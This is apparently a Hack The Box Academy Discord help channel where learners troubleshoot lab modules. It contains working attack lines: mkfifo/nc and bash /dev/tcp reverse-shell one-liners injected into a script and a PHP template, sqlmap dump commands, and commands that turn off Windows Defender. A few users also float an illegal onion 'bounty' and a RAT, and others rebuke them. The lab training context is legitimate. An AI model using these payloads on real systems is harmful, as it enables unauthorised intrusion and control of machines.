#modules
but yea, don't worry about speed. if you can complete it, you're all set
im new to this kind of stuff so what do i do if no ports pop up
Speaking of labs - I heard mixed opinions on Dante. Pretty much "It's good practice but a bit out of scope". Do you think I should rather skip it?
Full port scan or UDP there is nothing as no ports open
What r u preparing for ?
CPTS
Dante is easy if u finished all cpts modules u can for sure pwn dante
I dont think its out of scope
im trying to do an isp firewall
yes full port scan
some stuff is out of scope
Hi, I have some connexion problems with this part of the pivot module : RDP and SOCKS Tunneling with SocksOverRDP.
I can mstsc.exe to connect to the 172.16.5.19, begin the server, then on host 10.129, I started proxifier. And when I try to start mstsc, I can't connect. I also tried setting experience to modem. Any idea ? I use the pwnbox
what exactly are you trying to do
bounty
on converge router
i just finished cat so i was trying to do my first bounty
but none of the methods worked
i have no clue what u r talking about buddy
bounty on converge router?
yes
like a bug bounty program for Converge ICT?
where is this bug bounty program hosted
wait
found it
it says the bounty
i'm not clicking on that
Damn
bro no bug bounties are hosted on onion links this is 10000% illegal and we here in HTB dont work with this
bug bounty programs only on hackerone , bugcrowd and stuff like this
are the ones u should work on
dont work in this trash
cause its illegal
Do not post illegal content.
this is not ethical hacking
ur pwned pc will be the first bounty
ok bro just dont post here
that's a yikes
Hello, I need a little bit of help. I am on module https://academy.hackthebox.com/module/147/section/1327 Remote password attacks and am running the crackmapexec winrm on the target ip, however, i have tried a few lists. is there a certain password and user list i should be using? i've looked through the module but don't see anything specific
here, it should be somewhere at the top of the page
you'll find the necessary wordlists to complete this section in the .zip file
i've been on this like 3 days lol
you're a life saver lol
i was like it cannot take this long lol
yeah am at the end of this module i haven't had too much time to work on it
thank you again
can you help me please i lock 3 days
for network foundations modules
the last questions skill assessment
I made a rat who wanna risk their pc for me to hack them
hey everyone, I'm in the Windows & Attacks and Defense, working on Kerberoasting and I've been stuck for days now trying to connect to the DC for this question: After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user? .... the IP does not seem reachable. is anyone else having issues too? I was not able to SSH into the Kali machine either
i dont know this module but u 99% should make a pivot with whatever tool u prefer
Yeah you definitely need ligolo or chisel for that
i didnt do this module also but i am positive i can help can u elaborate more about the task
Not sure what you mean by using a tool I prefer. I've tried to ssh and rdp into the Kali, did not work. Then I tried to remote in from the WS001 machine. thought I was about to get it, as I was prompted to enter the password, but then got error message "The connection was denied because the user account is not authorised for remote log-in".
Yes
You do not need to ssh, it's all rdp
the Lab Environment section says you can either SSH or RDP. Neither worked for me
Bypass the request filtering found on the target machine's HTTP service, and submit the flag found in the response. The flag will be in the format: HTB{...}
For this question you need to use remote desktop
I tried it as well : I tried to remote in from the WS001 machine. thought I was about to get it, as I was prompted to enter the password, but then got error message "The connection was denied because the user account is not authorized for remote log-in".
How about trying from user bob?
What's the contents of table flag2? (Case #2)
I am stuck on here and don t have any idea how should I proceed , when I run sqlmap -r req.txt doesn t find anything :/
SQLMap Essentials module
sqlmap -r Case2.txt --threads 10 --dump -T flag2 --batch --level=5 --risk=3 --tamper=space2comment --random-agent
I also tried this command and nothing pop up to give me a clue to get the flag :/
This Process Injection module is looking mighty fine, I might fork out the big bucks to do it.
Hoping it eventually becomes part of a pathway
solved
Help please
??
hello
which module
With?
For module network foundation last question of skills assessment please
Bypass the request filtering found on the target machine's HTTP service, and submit the flag found in the response. The flag will be in the format: HTB{...}
That please I lock 3 days
Today 4 days also
I can't help, but ask your question directly, that's a tier 0 module so share exactly what you're having trouble with and someone may be able to help
Generally I'd initially recommend going back over the module and sections
There's a roundabout way to do it if you read the section
They will cover all you need to answer the question
Though I disagree with connecting to ||ftp|| with nc
It's fairly directly laid out how to at least scan throughout the reading
Yes but how ?
Where ? I try a lot
There's more text to the skill assessment than just the questions
For the module Linux Privilege Escalation do we have various path to obtain the flags on the Skill Assesment (at least for the last flag) ?
they don't say how to do it
It's helpful to know how to do different methods
Yes, they do
Ok thanks, I will look for the methods I missed
tell me how to do it I do it because I know where it is written
Please
Where it says "chapter 3 target acquired" Click the "show more" arrow
It's on the page
it's not written there I read it several times
Yes. It is
Where that please ?
Where in chapter 3
For fucks sake
It's not chapter as in section 3 (components of a network)
But read the whole of what's given to you
Oki I read completely so
Then you'd know what to do, while I disagree with using nc to connect to the services it works just the same
What did jarednexgent have to say @fresh canyon
It goes through getting a file off FTP; reading the file; setting the proper headers
It's okay k do that and I return after thanks
That's kinda outlined in the section mentioned.. I'd recommend going through and exercising the steps detailed in the module / section, they provide important information pertaining to the questions.
I see , thanks again
Sorry , and thanks you so much
the ftp is closed on the ftp module, even the one mentioned in the solution, double checked and scanned specifically for that port, i dont think this is intended
3 resets fixed it
In the Active Directory module, DCsync section :
https://academy.hackthebox.com/module/143/section/1489
It is written :
If we had certain rights over the user (such as WriteDacl), we could also add this privilege to a user under our control, execute the DCSync attack, and then remove the privileges to attempt to cover our tracks. DCSync replication can be performed using tools such as Mimikatz, Invoke-DCSync, and Impacket's secretsdump.py. Let's see a few quick examples.
I don't understand, to me it's wrong. It's WriteDacl over the domain and not over a user that could allow to give us replication privilege on a user we control.
You don't necessarily have to have WriteDACL in the domain. What it means is that by having "WriteDACL" on a user that you have control over, you can give them DCSync privileges "Replicate directory changes" and "Replicate directory changes all" and you will be able to perform DCSync.
ACLs can be applied to other objects, including the domain root object (Domain Object).
No, that's false and implausible (any user having a writedacl over another user could give DCSync over a domain):
https://support.bloodhoundenterprise.io/hc/en-us/articles/17312765477787-WriteDacl
by having WriteDACL privileges over an object you can give that user rights that you otherwise might not under normal circumstances
nothing about what they said is "implausible"
and the bloodhound link you sent doesn't refute what was said
in some cases you're chaining together vulnerabilities; you're granting additional rights over X in order to perform Y as X, for instance
in this case since you can write the DACL properties you can literally add the DCSync ACE/ACL rights
i'm kinda confused myself actually
let me do some googling
ok so
WriteDacl allows you to modify the DACL of the object
that means that you can modify any ACEs in the DACL for that object
but in order to grant the permissions for DCSync (DC-Replication-Get-Changes and DC-Replication-Get-Changes-All), you have to be able to modify the DACL of the domain object since those permissions can only be granted on the domain object
so if we have a user that has permissions to DCSync and we have WriteDacl over this user, then we could:
- force change their password to something we know
- using their credentials, modify the DACL of the domain object to grant DCSync permissions on a user that we control
- perform DCSync with our controlled user
- modify the DACL of the domain object again to remove DCSync permissions from our controlled user
So its just WriteDACL over the domain no?
i guess out of context, it is worded strangely
reading the prior paragraphs it'll make sense
"obvious thing is obvious" situation
They added a new feature? Note?
yes
neat feature (someone can feel free to steal this for a /feedback):
- could be more clear that clicking off closes the note window
- allow the note window to be pinned open
- allow the note to be downloaded in some way (beyond Copy/paste)
I don't see myself using it atm mostly because i already have a flow in place with obsidian, but if you could take notes and download them after, would be useful
im trying to curl but it returns nothing why so?
this is from the web requests module .and to be specific GET module
it tells you exactly how to perform the exercise -> use the browser devtools to figure out what the request is -> copy to curl and adjust to search for 'flag'
after copying the curl command and clicking enter on terminal why does it show please use curl
because you copied the user-agent
:P
you can also craft the request without copying to curl
Hi, actually i have problem to get flag for xss warm up lab on advance xss and csrf module
Admins (bot) does not check the page so i can exfiltrate the flag cookie
which section are you on
this one on lab warm up
Familiarize yourself with the lab environment. Use the components to exploit the XSS vulnerability to steal the victim's cookie.
module is above tier 0 please refrain from sharing specifics about it and it looks like the screenshot had a PHPSESSID in it
DM me
If I complete a module, e.g., Tier III Whitebox Attacks, would I be able to restart the module (so I could do it again) even after my subscription is over?
you won't be able to wipe the slate clean, but you can always revisit it after, yes
Okay nice. Thank you!
In Windows Attacks and Defense module: For the first challenges I did the kerberoasting and got the hash and answered question one but when I open up the other windows remote session with the given IP I can see the ticket request but not one for webservice which would give me the correct service sid or whatever it's called, Event Id: 4769
@fathom pendant okay thank you I forgot I was copying user agent
have you tried restarting the target to see if it shows up?
Yes a couple times
Did you look at the hint?
It wouldn't let me see hint idk why
ok DM me
probably something to do with your adblock or plugins
Ok
Hi I had a quick question; I'm going through the Windows Priv Esc module right now, and I'm on the section for DLL Injection.
in the DLL Hijacking subsection it says Process Explorer but shows Process Monitor; is that a typo or are they related?
Actually the problem was time based. It would stop working after about 10 minutes of running. So the higher the thread count, the more passwords it got through. It was really strange, I just got frustrated and just got all the B words from the mut_passwordlist and made a new list.
Just wanted the flag at that point
They are two applications from Sysinternals that deal with processes, I'm not really sure if what they put on there is a mistake or not because none of it is really wrong. You can find which DLL's a process loads with Process Explorer by viewing it's DLL's. Process Monitor can also see which DLL's load. They present the data in different ways but achieve similar results.
If you feel something is wrong or should be shown a different way you can post in #1234357888114364508
Ok thanks, was mainly just wondering if I was missing something lol, all of the screenshots are ProcMon but then that one point says process explorer; good to know about both I guess haha
Module Creepy Crawlies: Q: After spidering inlanefreight.com, identify the location where future reports will be stored. Respond with the full domain, e.g., files.inlanefreight.com.
Tried to install reconspider but cannot run the tool.
Getting error: 'Seems like you haven't installed Req or Your are not using python3 version, please install using: python3 setup.py install`
I have python3 installed
are you using the ReconSpider that's linked in the module or the one from Github; because they are different tools
@fathom pendant was using the github -- gtk thanks, will try the module steps instead
got it -- wow that was crazy straightforward
I'm really terribly stuck on the File Uploads Attacks' Skills Assessment exercise. Could someone please DM me and help me figure this out. I'm not looking for straight up solutions, just need a nudge in the right direction
yup; there's a reason they don't give a GH link LOL
I'm using Ligolo, also not being able to get this done
hi, anyone completed the linux privilege escalation module?
mb then ill rephrase. Anyone can help me get past environment enumeration part in linux privilege escalation module. I run linPEAS and found nothing helpful, checked the directories and used find / -name "flag*" 2> /dev/null but found nothing helpful?
oh ill go and check the environment variables and see if i can get anything
thanks for the hint!
i tried to find flag in all the directories i can see from the output of env but i cant find it? is the flag not stored in a file named flag?
Try ||grep -ER||
What I was saying is : If you want to perform a DCsync by having a writedacl permission, this writedacl has to be on the domain itself and not on a user as written in the course.
File Upload Attacks is above tier 0 please don't spoil anything
Hii guys I am getting error in DNS of footprinting module
I am ||getting recursion requested but not available error||
The question is
what is the IPv4 address of the hostname DC1
as i stated in #cpts you may need to look directly at the records instead of asking directly for DC1
one of the hostnames may contain DC1
the previous question may or may not be related iirc
It is
tunnel vision is a hell of a thing
Its part of the output of a query you would've already executed
yo man, what am i missing. i have been doing this section for about 4 hrs i still cant get it hahahaha
Thanks mate
Got the answer
Now I feel like a clown 🤡 missing that answer right in front of me

start from filesystem root and look outward
yep i figured it out. shouldnt have look for a file named flag to start with lol
thanks for the help!
tunnel vision gets ya good
real good. spent 4 hours staring at this module
Are the VPNs not working right now? Keep getting "Exiting due to fatal error"
run with sudo
ahh appreciate it
Mate's so experienced and can solve a problem without knowing the actual error 
Exiting due to fatal error, typically one or two lines above that would be something along the lines of not being able to create tun device
Hi, am stuck at "dirty pipe" linux PE any hints
./exploit-2: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./exploit-2)
tried python POC, didnt work
you'll need to either statically compile or compile on target
Thanks, compiling on target worked
but why?
i'm having a constant problem with RDP'ing into systems
i tried using various tools each of them
either it doesn't connect me at all
or if it does it lasts for a minute and crashes out and the same process repeats
This is on the Credentialed Enumeration of the Active Directory enumeration & Attacks
Any ideas or fixes?
got it.
Has anyone completed the skills assessment for the CrackMapExec module? I need help.
ask your question
If you can successfully RDP into a machine, but it crashes, it might be a VPN issue. Worth experimenting with switching to another VPN endpoint.
For context, every time this happened to me, it was usually a networking issue - intermittent VPN connection and such.
I'm stuck on the third question.
I gained admin privileges on SQL01, but I haven't been able to make any further progress.
A small hint would really help.
I have compromised the accounts Juliette, Atul, sqldev, and Administrator (SQL01),
but I don't have write permissions on the shares.
Try things outside of wordlists. There are many DNS enumeration techniques to get you some more vhosts
Apart from that i have also done
|| Zone transfer on those subdomains||
And I couldn't find any hosts there or brute force either
Could you give a hint ?
Using dnsenum , I could only get some results from ||dev.inlanefreight.htb|| others all just getting NS record query failed
That above subdomain also running for more than 1 hour and still couldn't get desired result
what wordlist are you using?
Might try the fierce
Check resources
I reckon you just need to change the wordlist
You're on right track
Trying that now brother
Haaaaaaaa
Finally got it brother
Thanks a lot
Lovely! Well done.
anyone finished using crackmapexec module?
talk to me
Hi, I am really stuck with this question "What is the API key in the hidden admin directory that you have discovered on the target system?" from the skills assessment section of Information gathering - web edition Module "https://academy.hackthebox.com/module/144/section/1311" I can't find the API key, I found the hidden directory, it's the only question of this section I am missing, because I found the email and the key that developers will be changing too, but this one I can't, any hint?
Hey will there be an Exam on the new job path ai red teamer That would look really good on my resume
Hello everyone, after numerous attempts, I am still stuck on the question: 'What is the API key in the hidden admin directory that you have discovered on the target system?' in the Information Gathering Skills Assessment. Can anyone please help me out and guide me on how to solve this?
same here, I'll let you know if I get something
Yes, please
Currently in the DNS section of the footprinting module, The first question "Interact with the target DNS using its IP address and enumerate the FQDN of it", how do i Interact with the target DNS? I've already done a DIG NS
Hello everyone,
I have an interrogation about the Web Services section of the Login Brute Forcing module.
I don't understand why the output of netstat we do on the ssh session does only show opened services on port 22 and 21. The SSH service we used to connect is at another port (for me it was 30769). Also, if the netstat output shows a listening FTP service on port 21, why does it tell that the FTP service is running locally ?
I'll look into it
Hello I was trying to complete the Public Exploits section in the Getting Started module. I have found an issue, only the pwnbox allowed me to complete. i used metasploit as asked and correctly set RHOSTS, RPORT and FILEPATH, but when I ran exploit i never got the success message. When I did the exact same thing on the pwnbox it worked. Anyone know why or if this is a singular issue or how I can fix/prevent this from happening again?
Have you tried to access the hidden directory?
If you are running the pwnbox at the same time as your VM, it will cause major issues.
What you did should get you to the answer
it did lol ty
I wasn't @proud pine
guys i am stuck at web service and api attacks skills assessment , any hints please
Did you use academy vpn?
I didn't have the option
Because it was one of those web accessible boxes
So no openvpn download link
@young ore
For the academy it is best to always use the openvpn if you are working from the VM
So you don't stray from the environment
@silk dew
But how do I connect when there's no setting for that in that section?@young ore
You don't have to download openvpn for each section
You can download one from the previous section
And use that for the rest of your academy session
I'm at the attacking common applications osTicket right now. First, love HTB and the course, so do not misunderstand me. But. Tbh, this is by far the "not so good" module winner so far. It's very unclear what the task is, but reading some posts you are actually supposed to just recap exactly what was shown in the section, logging in as one of the two users with provided passwords. ok, interesting. But if access is constantly denied, then what is the purpose of this section? How am I supposed to tackle this? Sorry, do not mean to have attitude just a little bit frustrated. Thanks in advance!
i just tried with an openvpn i had downloaded from 2 or 3 sections ago, successfully connect, but the metasploit still doesnt do anything
exact same configs as in the pwnbox (shut down)
there must se something im not doing right, this works perfectly fine in the pwnbox i wasted like 2 hours in the vm when I had the correct solution in the first 3 mins
If you compare the one that works and the one that doesn't, that might provide you clues of what is wrong
I'm completely stuck on Server-side Attacks - Exploit a SSRF vulnerability to identify an internal web application. Access the internal application to obtain the flag.
I really need a hint, I don't know how to explain where I'm at without spoilers. Feel free to dm me.
Can anyone please help i installed xfreerdp but when i run the command in image it isnt recognized
hello everyone
i am working on Introduction to Windows Evasion Techniques
section : Static Analysis
i have done everything that the question want and i was able to bypass the AV
[03/06/2025 09:36:59] C:\Alpha\Static\EvasionApp.exe - OK - Undetected by Microsoft Defender Antivirus
[03/06/2025 09:36:59] C:\Alpha\Static\ex.exe - OK - Undetected by Microsoft Defender Antivirus
but i can't see a flag and i see a lot of people talk about this problem , so can anyone help me please , ( i have tried to compile the .cs file with 2 methods )
im not sure on what I should compare, they bot return the 2 same lines, with the exception that the pwnbox also says that the file was successfully retrieved. Sorry im quite new in all of this
Someone please, is this a copy and paste competition, or are you actually supposed to try and learn something in the above referenced module?
does footprinting lab hard have privilege escalation?
Hi, anyone can help me in "ADVANCED SQL INJECTIONS - CWEE" Skill assesment QUESTION 1-?
I already got everything but the ||token to reset pass||is not working for any reason, someone can help me please?
any hint?
I'm completely stuck on Server-side Attacks - Exploit a SSRF vulnerability to identify an internal web application. Access the internal application to obtain the flag.
I really need a hint, I don't know how to explain where I'm at without spoilers. Feel free to dm me.
If you want you can send me dm
i sended
Hi Guys who has done weak permissions in WIndows Privilege Escalation?
Did you use the right credentials?
does anyone know how to fix this problem in Getting started module
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
guys i am stuck at web service and api attacks skills assessment , any hints please
i wouldn't worry about that error
you can inject the code and it'll work just fine
but thats the last step to use sudo /home/nibbler/personal/stuff/monitor.sh
and get root access
it's the semi-last step
you first need to add the code to connect back to your machine (on a different port)
:)
since you know, you do have write access over that file
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh
this?
and i'm assuming you adjusted the nc command to be YOUR tun0 ip
but yes
yes
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.36 8443 >/tmp/f' | tee -a monitor.sh
so you need to set up another listener on port 8443
its active on diff shell
then it should connect
if it "hangs" when you run the command, that means it's connected
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.36 8443 >/tmp/f' | tee -a monitor.sh
tee: monitor.sh: Permission denied
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.36 8443 >/tmp/f
Guys has anyone done Weak Permissions in Windows Privilege Escalation?
this what im getting
Yea dm
Are you in the same directory as monitor.sh?
nibbler@Nibbles:/home$ cat /home/nibbler/monitor.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.36 8443 >/tmp/f
Can you rename it and make your own?
Hey I wrote RAT for check this in my VM
And I have some problem someone can help me ?
im in root somehow but i dont see flag
└─$ nc -lvnp 8443
listening on [any] 8443 ...
connect to [10.10.16.36] from (UNKNOWN) [10.129.205.173] 50878
whoami
root
ls
Nothing in the root directory?
mistyped a cd command and now it stuck
wdym "now it stuck" :)
ls -la and pwd are great for finding where you are
thanks i got it
i was focusing on [[ error where i should've ignored and checked nc port for reverse shell of root
yep
thanks a lot and @safe star aswell
How did you figure that out that reverse shell rm /tmp/f command will work even though it's giving error in part script
because of how sh scripts work
they will execute line by line even if an error occurs, this is because there's no exit command given in the script
Oh thanks I didn't know that, as reverse shell command was at last and it was hanging and I thought errors must be solved somehow and I wasted hours finding it
Just checked on my VM and it works for me, try add: set VERBOSE true and run the exploit again
I will try, thanks
Hi im doing tunneling and pivoting module
reverse port forwarding with ssh im
trying to get a reverse shell on the windows machine.
1.I moved the payload to the windows host
- I started meterpreter listener on my machine on port 8000
- I try to run remote port forwarding using the following command
ssh -R 172.16.5.129:8080:0.0.0:8000 ubuntu@172.16.6.19
But i cant connect to it i get "connection timed out"
Hello how can I get a link for hacking games ?
You'll need to subscribe / purchase cubes however, as it is not a free module @cobalt rivet
Hi all,
I'm going crazy, I want to ouput different files such as file1, file2 etc, using something like : cat directory/file*
I need sudo in my case so sudo cat directory/file*
I get the cat: 'directory/file*': Input/output error error
Can someone pls tell me how to fix this ? Thx
I tried sudo cat "directory/file*"
I'm on PwnBox btw
Update : I made it work using the forbidden technique : sudo -s
does that file exist
Yes 100%
awesome
it was a permission issue
next time try sudo bash -c "cat directory/file*"
But is there a correct method ? Because it seems horrible
sudo only elevates the command not how the shell expands file*
i'm gonna try that thx
Ok so with this you run the entire command with sudo privileges ?
I think i was able to do "sudo cat directory/file1" when naming precisely the file
yea got it mb thanks a lot
awesome
hey staff i can change my username please
https://academy.hackthebox.com/module/113/section/1208 (question 4: Following the steps in this section, obtain code execution on the host and submit the contents of the flag.txt file in the webroot)
-I've tried all the WordPress theme pages to get code execution on 404.php and everyone give: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP
-I've watched videos where this works perfectly, but all my themes in WP won't work?
https://academy.hackthebox.com/module/77/section/730
I can't get my reverse shell to work I have a listener and I made sure the ip in the reverse shell was the right one from my vpn by looking at tun0 in ifconfig
hello guys i am on xss phishing section in xss module they give me as a target and ip without port like this 0.0.0.0(ACADEMY-XSS-ASMT) how i can use this to access the website that i can work on ??
just place that IP on a browser and you'll have it
@polar raven AD enum and Attacks is above tier 0 refrain from sharing screenshots of the module
@sand sedge try respawning the target instance.
That IP of 0.0.0.0 is not valid.. could be the instance failed to spawn properly
does it give it to you as 10.129.x.x?
or were you using 0.0.0.0 as a placeholder
Placing 0.0.0.0 in a browser will not do anything
Oh.. good point marcie..
because some sections in the xss module are on the private network; such that you can get a revshell
I believe he is saying that its only an IP like x.x.x.x not x.x.x.x:xx
and perform stealing credentials
which is common for targets on the vpn network
I took what they said too literally
10.129.x.x for targets on the vpn network otherwise it's a public_IP:port
if given 10.129.x.x (unless otherwise instructed) you can assume default http:// port
ah sorry
this section doesn't have an interactive target
thanks
was referring to this one https://academy.hackthebox.com/module/77/section/852
my question from above just disappeared whattt
exactly
contains potential spoilers
for a module above t0 :))))
https://academy.hackthebox.com/module/176/section/1787
Can someone help me verify my answer for the second question? since I believe firmly its right, but somehow not working
true, my bad. But how can you help me, if I dont show it to you? Because I've searched everywhere, and know this is the answer
i assume you attempted the attack first then patched and tried again? (i haven't done this module)
to ensure that the issue isn't some weird networking error
in which case:
respawn target
change vpn -> respawn target
yes, done everything already, with the server listening and changed the value
has anyone done https://enterprise.hackthebox.com/academy-lab/33864/5252/modules/158/1437 ?
sadly trying to get the right chisel version on there is harder than the actual pivoting. between this and some issues with rpivot not sure if there is a way to flag a module for needing some updates
most people don't have enterprise accounts, better to simply say the name and section of the module.
sure its Pivoting, Tunneling, and Port Forwarding: SOCKS5 Tunneling with Chisel
ahh yes, you have to use an older version of chisel or static build the newer versions. i believe i used 1.7.4 which worked without issue.
got ya did you just download from git hub or did you mess with trying to change the version after a git clone?
i tried via git clone and i kept running into issues with it not installing the correct version
cool thanks ill just try that
hello I'm stuck on this module https://academy.hackthebox.com/module/77/section/859
I made sure to setup the lhost as the ip from the vpn
[*] Exploit completed, but no session was created.
yet I get that at the end
what port are you using?
4444
looks like running chisel 1.7.4 AND 1.3.1 im getting the same error. think im just going to bed but a little frustrating when ive spent more time troubleshooting versioning than the tunnel itself
maybe this isn't the right exploit
I wish but no
found this exploit off a video youtube and the post from medium
I've been having issues before trying to get a reverse shell
I think it comes from me tbh
Ima try the web instance
I am stuck on the format of the answer of
Intro to Whitebox Pentesting : Eval Injection
https://academy.hackthebox.com/module/244/section/2705
Question: Try to reach the 'eval' function by adding a breakpoint within 'generateQR' and modifying the value of 'role'. Then, send a request to the /generate endpoint with 'text' set to: "`;// What is the response you get?
I found the response but it's not accepting
Did anyone go through this ?
it's working on the web instance I guess I gotta do stuff with my machine which is weird cause I'm using the same lhost ip from the vpn and I checked with ifconfig so idk
okay i think there are a couple different ways, but i was able to do it with the one you provided, so i would double check your settings. maybe set lhost to 0.0.0.0 or tun0
will do thanks
sorry for getting back to you so late, had to step away. have tried that as well, no luck
you can ping the target and visit the site right?
Stuck on the file upload skills assessment, I've got the file uploaded and I have the source code. Trying to navigate to the location where the file is stored but I'm getting a 404 error if anyone can help
Know the target you are attacking and remember HTB is not based out of the US...
Oh my god that was it
Is there a query with this?
It failed to download so I put this
I'm not sure I understand, sorry
Me too
What I mean is, what is the issue you are facing?
The academy one to link my account
What have you tried, and what was the result, please outline each step
I don't know if you mean link with an SSO account, or link with Discord (which would be via a Labs account)
Follow the instructions in #welcome - you need to obtain your token via the Labs platform
Thx
I can't load the page to connect my htb acc to my discord one
What is the URL you are visiting to obtain your token @wild rapids ?
atm the linking on the platforms via the discord button doesn't do anything, you have to go through the manual process outlined in #welcome
I am working on the module Introduction to Windows Command Line - All About Cmdlets and Modules. I am trying to follow the Import-Module .\PowerSploit.psd1 instruction. But the error seems to come from Windows.
At C:\Users\htb-student\Desktop\Powersploit\PowerSploit-master\PowerSploit.psd1:1 char:1
+ @{
+ ~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:1
+ Import-Module .\PowerSploit.psd1
I have already set the execution policy to Bypass.
PS C:\Users\htb-student\Desktop\Powersploit\PowerSploit-master> Get-ExecutionPolicy -List
Scope ExecutionPolicy
----- ---------------
MachinePolicy Undefined
UserPolicy Undefined
Process Bypass
CurrentUser Bypass
LocalMachine Bypass
What can I do with this Windows Defender or Powershell blocking the script?
it says the script was blocked by your antivirus, so i'd assume it's defender blocking it. maybe disable real-time protection or exclude the folder it's in.
I have already tried sc stop windefend. Access is denied.
Also cannot xfreerdp in. Only Powershell and cmd is available.
Any insights ?
I encountered the same error. Did you manage to resolve the problem? How did you solve it?
I just tested, I was able to do this by disabling the AV (not just stopping the service)
How do you do that? I am still at the Fundamental modules.
Thanks. Checking it ...
i asked chatgpt and it gave me the command but when i googled i saw it there too. chatgpt can be a great tool for finding commands, but just know sometimes it's wrong.
@little bolt be careful with potential spoilers seeing as the API attacks module is tier 2 (see the channel topic)
I use the Set-MpPreference -DisableXXX $true. I managed to turn off the RealTimeProtection and imported the PowerSploit module. Gotta get this into my notes.
Thanks. SuperNuts.
Pipe do wonders
I am stuck at the Containerization section of the Linux fundamentals module, can some one tell me how to configure network settings for my lxc container
All right I see, I am sorry for showing commands, but how can I seek for help or support since I am stuck and I can't find anything to unblock me :/
you don't need to worry about that tbh
module and section name with a description of your issue
and it can be taken to dms from there with someone who's willing to help
Module : API Attacks
Section : Broken Authentication
with a brief description of your issue
I'm trying to brute-force the OTP for password reset using ffuf, but I'm not getting any valid results. I successfully triggered the OTP request and got a { "SuccessStatus": true } response, so the OTP should be generated. However, ffuf doesn't return the correct OTP, and all responses seem the same.
?
Module: File Upload Attacks
Section: Skills Assessment
So I've been stuck here for 2 days now, I got the location of where my uploads are going like I was meant to. All I need to do now is upload my payload and that is getting uploaded as well. But when I try to visit the file, it gives me Error 404 Not Found. I know that I've given the correct file name and path because when I use the same steps to visit an image I uploaded it works. Can someone please help me out here
I tried all combinations of the username / email and passwords from the two users in the example. No access. What am I missing?
I tried slowing the scan down as well
ok, i backed up one subdomain and tried the robots.txt -- looks like i'm back on track (potentially)
@gaunt scroll spoilers :) anything you had to fuzz/find is a spoiler
@fathom pendant my apologies
apparently you didnt
worked just fine for me
re: all sorted
anyone having issue starting pwnbox?
Hmm, the problem might've been on the details. Try putting the IP instead of the DC1 when entering the computer name
not in eu at least, not for me anyhow
The eu doesn't seem to get affected i guess
Try switching the pwnbox location, that might help
i did try switching to different locations. doesnt help.. though i already reached out to support for help. thanks guys
same issue
i just setup a local windows vm to complete the module
There will be some amount of disruption to services, although it looks like we may be missing the notification on the status page, or have the time wrong
Please stick with us, there is a maintenance period ongoing, and we'll have it done as soon as possible. Unsure why the notice was not properly up on the status page. Apologies. Any time missed on your exam, please raise it with support and they will assist you once the maintenance is complete
Welcome to the HTB Status Page
Hi, did HTB have an issue today? I had a problem with my connection on my vm. The target machines are not spawning.
yeah check the status page
probably make an announcement in the discord cos people will keep asking
case in point ^^^
there is no announcement on discord I guess. how to check ? which status page?
Welcome to the HTB Status Page
It was literally 2 messages above yours lol
pong
Thanks.
Hi all, can someone give me a right direction for "PoC and Patching - Null Safety"? Played with some promising functions but got nothing in the end.
Hi, can anyone please give me a hint in ADVANCED SQL INJECTION QUESTION 2? I got the sqli but I noticed that the user doesn't have superuser permission!!
can anyone tell me what can i do with TGS for SPN like HOST, TERMSRV or RestrictedKerHost?
having trouble when pwning getsimple box
#spoilers ahead
- I can enumerate the target
- can access the admin portal and logged in successfully
- whenever i attempt to edit template.php and click save and continue the page tries to reload and after it loads the one liner that i put there is gone
- tried different reverse shell one liners
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.### 9443 >/tmp/f"); ?>
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.###/9443 0>&1'"); ?>
- i have a nc listener
- tried exploiting the target with metasploit but with no avail, throws
```
[+] 10.129.195.49:80 - The target is vulnerable.
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.255:4444
[*] Exploit completed, but no session was created.
```
what am I doing wrong here?
Alright thank you. I will delete my post
Hi, I have a question, if I activate the step-by-step solution, do the cubes I should earn when completing a question turn to zero ?
Not all questions give cubes, in some modules only the final skill assessment gives cubes. Are you sure it says you'd be getting cubes before you activate the option?
Got it, I think that question didn't give cubes
i'm currently in the SMTP section of the footprinting module, and i have the footprinting wordlist to enumerate the user on the smtp server, how would i use this Wordlist to filter out which users are active on the system?
it give me the ip not 0.0.0.0 it's just a example but when typing that ip into browser it gives nothing
to add on to this, i've tried using an nmap script to use the custom wordlist which is a resource in the module, it looks like the nmap scan isn't picking up the users, just generic names such as "root" or "admin"
Do a little bit of google searching, iirc the nmap script SHOULD work but if it doesn't there's a couple of alternatives
Think i've got it with some google
I hope lol
i definitely need to use google more, my biggest problem is not knowing what to google
Looking back at it now I don't think the nmap script's default wordlist has the proper names and have no clue how to change it 
I had to scrap nmap and just use script-enum-users
done some research on the syntax, got it in the end
yeah looking through the args it's not very straightforward for nmap
we got there in the end
nmap <SNIP> --script-args brute.creds="<PATH TO WORDLIST>",brute.mode="user"
could you try this out? don't have my vm handy ^
the script and other args you might wanna use
hi
Review the HTML source code of the page to find where the front-end input validation is happening. On which line number is it? here I don't know where to look
I tried also source code and could not find the right answer, any suggestions?
My suggestion is: be more specific, which module and section?
Nice, so now someone who's actually done that module can get back to you.
Can you send me hackthebox link I want to verify
You can find it in #welcome along with the instructions
That's illegal, go contact google support, we are not a hacker4hire server
I've already tried
